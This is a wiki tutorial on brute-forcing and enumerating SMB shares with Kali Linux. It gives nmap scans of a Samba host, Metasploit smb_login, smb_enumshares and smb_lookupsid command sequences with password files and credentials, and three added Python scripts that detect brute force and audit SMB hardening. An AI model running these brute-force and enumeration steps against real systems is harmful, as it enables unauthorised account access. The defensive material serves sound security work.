Kali Linux: Breaking the File Sharing Password on Windows 7

From OnnoWiki

Source: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Network Scan

Example

nmap -sS -A -O 192.168.0.7
nmap -sS -A -O 192.168.0.0/24
nmap -sS -A -O 192.168.0.7,90


Example output

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
| ssh-hostkey: 
|_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
80/tcp    open  http        lighttpd 1.4.31
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd 1.4.31
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
| Not valid before: 2007-06-13T05:47:53 
|_Not valid after:  2027-06-08T05:47:53
|_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 30)
8873/tcp  open  ssl/rsync   (protocol version 30)
9001/tcp  open  http        libwww-perl-daemon httpd 1.36
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Squeezebox Server
9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
9090/tcp  open  http        uTorrent WebUI
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
22939/tcp open  ssl/unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE
OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T
OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B
OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W
OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%
OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 

Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows 

Host script results:
|_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: TS-WVHL54C
|_  System time: 2016-02-11T06:18:51+07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol 

TRACEROUTE
HOP RTT     ADDRESS
1   2.71 ms 192.168.0.7 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
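The host-script section of the report above is where the defender-relevant SMB facts sit: the guest account was accepted, message signing is disabled and only SMBv1 is offered. The following Python script is an added example (not part of this page or of the referenced blog post) that parses that text form of the Nmap output and turns those lines into hardening findings per host. The sample input is an abridged, constructed copy of the report shown above; the regular expressions only cover the "Nmap scan report", port and "|"-prefixed script lines and are this example's own assumption about the layout.

```python
import re
from collections import defaultdict

# Constructed sample: an abridged copy of the Nmap report shown above for the
# Samba host at 192.168.0.7 (only the lines this parser cares about).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol 
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# "| script-name: " or "|_script-name: value" opens a script block
SCRIPT_RE = re.compile(r"^\|_? ?([\w-]+):\s*(.*)$")
# "|   key: value" (two or more spaces) is a line inside the current block
KV_RE = re.compile(r"^\|_?\s{2,}([^:]+?):\s*(.*)$")


def parse_nmap_text(text):
    """Return {host: {"ports": {port: service}, "scripts": {name: {key: value}}}}."""
    hosts = {}
    host = script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            hosts[host] = {"ports": {}, "scripts": defaultdict(dict)}
            script = None
            continue
        if host is None:
            continue
        m = PORT_RE.match(line)
        if m:
            hosts[host]["ports"][int(m.group(1))] = m.group(2)
            script = None
            continue
        m = KV_RE.match(line)
        if m and script:
            hosts[host]["scripts"][script][m.group(1).strip()] = m.group(2).strip()
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            if m.group(2).strip():
                # single-line script result, e.g. smbv2-enabled
                hosts[host]["scripts"][script]["_value"] = m.group(2).strip()
    return hosts


def smb_findings(info):
    """Translate the smb-* script results of one host into hardening findings."""
    findings = []
    ports, scripts = info["ports"], info["scripts"]
    if 139 not in ports and 445 not in ports:
        return findings
    sec = scripts.get("smb-security-mode", {})
    signing = sec.get("message_signing", "")
    if signing and not signing.startswith("required"):
        findings.append(f"SMB signing is '{signing}': sessions can be tampered with "
                        "or relayed; require signing on the server")
    if sec.get("account_used") == "guest":
        findings.append("guest account accepted: shares and users can be enumerated "
                        "without valid credentials; disable guest/anonymous access")
    if "doesn't support SMBv2" in scripts.get("smbv2-enabled", {}).get("_value", ""):
        findings.append("only SMBv1 is offered: disable SMBv1 or upgrade the server")
    return findings


def audit(text):
    """Map each scanned host to its list of findings (empty list = nothing flagged)."""
    return {host: smb_findings(info) for host, info in parse_nmap_text(text).items()}


if __name__ == "__main__":
    for host, findings in audit(SAMPLE_NMAP_OUTPUT).items():
        print(host)
        for f in findings:
            print("  -", f)
```

Run against the full report saved from nmap -oN, the script lists every host with SMB on 139/445 and the three weaknesses the scan above exposes; a host whose smb-security-mode shows message_signing: required and a non-guest account produces an empty list.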

Hack Password

This uses brute force to hack the password. The method is quite "noisy" because every attempt we make is recorded / logged by the server, so it will be detected.


msfconsole
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set PASS_FILE /home/sathish/password
set THREADS 10
run
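
The "noisy" point above is what a defender relies on: a wordlist run by smb_login shows up as a burst of failed logons from one source address, usually followed by one success. The following Python script is an added example (not code from this page or from the referenced blog post) of the detection logic a log monitor would apply. It reads a constructed, simplified logon log (timestamp, source IP, account, result), which stands in for Windows event 4625/4624 with logon type 3 or Samba's authentication messages after a SIEM has normalised them; the field layout and the thresholds (5 failures in 60 seconds, 3 distinct accounts for a spray) are this example's own assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one SMB logon attempt per line as
# "<ISO timestamp> <source IP> <account> FAILURE|SUCCESS".
SAMPLE_AUTH_LOG = """\
2016-02-11T07:41:02 192.168.0.5 onno FAILURE
2016-02-11T07:41:03 192.168.0.5 onno FAILURE
2016-02-11T07:41:03 192.168.0.5 onno FAILURE
2016-02-11T07:41:04 192.168.0.5 onno FAILURE
2016-02-11T07:41:05 192.168.0.5 onno FAILURE
2016-02-11T07:41:06 192.168.0.5 onno FAILURE
2016-02-11T07:41:07 192.168.0.5 onno SUCCESS
2016-02-11T07:50:00 192.168.0.9 alice FAILURE
2016-02-11T07:55:00 192.168.0.12 bob FAILURE
2016-02-11T07:55:01 192.168.0.12 carol FAILURE
2016-02-11T07:55:02 192.168.0.12 dave FAILURE
2016-02-11T08:10:00 192.168.0.9 alice SUCCESS
"""


def parse_auth_log(text):
    """Return a list of (timestamp, source_ip, account, succeeded) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split()
        events.append((datetime.fromisoformat(ts), src, user, result == "SUCCESS"))
    return events


def detect_bruteforce(events, window=timedelta(seconds=60),
                      max_failures=5, spray_accounts=3):
    """Sliding-window detection per source address.

    Raises a MEDIUM alert when a source accumulates max_failures failed logons
    inside the window (one account hammered, as smb_login with a wordlist does)
    or fails against spray_accounts distinct accounts (password spraying), and a
    HIGH alert when a flagged source later logs on successfully.
    Returns a list of (timestamp, source_ip, severity, message).
    """
    alerts = []
    recent = defaultdict(deque)   # source -> deque of (timestamp, account) failures
    flagged = set()               # sources already alerted on
    for ts, src, user, ok in sorted(events):
        q = recent[src]
        while q and ts - q[0][0] > window:   # drop failures outside the window
            q.popleft()
        if ok:
            if src in flagged:
                alerts.append((ts, src, "HIGH",
                               f"successful logon as '{user}' after a failure burst"))
            continue
        q.append((ts, user))
        if src in flagged:
            continue
        accounts = {u for _, u in q}
        if len(q) >= max_failures:
            flagged.add(src)
            alerts.append((ts, src, "MEDIUM",
                           f"{len(q)} failed logons within {window.seconds}s "
                           f"against {sorted(accounts)}"))
        elif len(accounts) >= spray_accounts:
            flagged.add(src)
            alerts.append((ts, src, "MEDIUM",
                           f"password spray: {len(accounts)} accounts tried "
                           f"within {window.seconds}s"))
    return alerts


if __name__ == "__main__":
    for ts, src, sev, msg in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(f"{ts.isoformat()} {src:14} {sev:6} {msg}")
```

The single failure from 192.168.0.9 followed by a success twenty minutes later never crosses a threshold and stays silent, which is the behaviour wanted for an ordinary mistyped password. Lockout policy and SMB signing reduce what the burst can achieve, but the log pattern itself is the signal to alert on.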


Using the smb_enumshares module, we can enumerate every SMB share available on the remote system.


use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser onno
set SMBPass s3cr3t
set THREADS 10
run

The smb_lookupsid module brute-forces SID lookups against a set of targets to determine which local users exist on the system.


use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass bhuvi
set SMBUser sathish
run
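
Share enumeration and SID lookups of the kind the two modules above perform depend on what the file server permits to guest and anonymous sessions, and the scan earlier on this page showed exactly the permissive defaults of a Samba 3.x host (guest accepted, signing disabled, SMBv1 only). The following Python script is an added example (not code from this page or from the referenced blog post) that audits an smb.conf for those settings, with a constructed weak configuration beside a hardened one. The parameters it checks (server signing, map to guest, restrict anonymous, null passwords, server min protocol / min protocol, guest ok, public, writable, read only) are real Samba parameters; the choice of which values to flag is this example's own hardening baseline.

```python
import configparser

# Constructed weak configuration, mirroring the defaults the scan above exposed.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   security = user
   map to guest = Bad User
   server signing = disabled

[public]
   path = /srv/public
   guest ok = yes
   writable = yes

[data]
   path = /srv/data
   valid users = onno
   read only = no
"""

# Constructed hardened counterpart.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   security = user
   map to guest = Never
   server signing = mandatory
   restrict anonymous = 2
   server min protocol = SMB2

[data]
   path = /srv/data
   valid users = onno
   read only = no
"""


def load_smb_conf(text):
    # smb.conf is INI-like: parameter names are case-insensitive (configparser
    # lowercases them), '%U'-style macros must not be interpolated, and both
    # ';' and '#' start comment lines.
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",), comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp


def is_yes(value):
    """Samba boolean: yes/true/1 are true, anything else false."""
    return str(value).strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return (section, parameter, advice) tuples for settings that invite
    guest access, null-session share/SID enumeration and unsigned sessions."""
    cp = load_smb_conf(text)
    g = cp["global"] if cp.has_section("global") else {}
    findings = []
    if g.get("server signing", "default").strip().lower() != "mandatory":
        findings.append(("global", "server signing",
                         "set 'server signing = mandatory' so unsigned sessions are refused"))
    if g.get("map to guest", "Never").strip().lower() != "never":
        findings.append(("global", "map to guest",
                         "set 'map to guest = Never' so failed logons are not mapped to guest"))
    if g.get("restrict anonymous", "0").strip() != "2":
        findings.append(("global", "restrict anonymous",
                         "set 'restrict anonymous = 2' to block null-session share and SID enumeration"))
    if is_yes(g.get("null passwords", "no")):
        findings.append(("global", "null passwords", "set 'null passwords = no'"))
    minproto = (g.get("server min protocol") or g.get("min protocol") or "").strip().upper()
    if not minproto.startswith(("SMB2", "SMB3")):
        findings.append(("global", "server min protocol",
                         "set 'server min protocol = SMB2' so SMBv1 clients are refused"))
    for share in cp.sections():
        if share.lower() == "global":
            continue
        s = cp[share]
        # a share inherits 'guest ok' from [global] unless it sets its own value
        guest = is_yes(s.get("guest ok", g.get("guest ok", "no"))) or is_yes(s.get("public", "no"))
        if guest:
            writable = (is_yes(s.get("writable", "no")) or is_yes(s.get("writeable", "no"))
                        or s.get("read only", "yes").strip().lower() in ("no", "false", "0"))
            mode = "read/write" if writable else "read-only"
            findings.append((share, "guest ok",
                             f"share allows {mode} guest access; set 'guest ok = no' "
                             "unless anonymous access is intended"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label}: {len(audit_smb_conf(conf))} finding(s)")
        for section, param, advice in audit_smb_conf(conf):
            print(f"  [{section}] {param}: {advice}")
```

On a Windows 7 file server the same review is done against the SMB signing and guest/anonymous enumeration policies rather than an smb.conf; the Samba form is used here because that is what the scanned host at 192.168.0.7 runs.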

References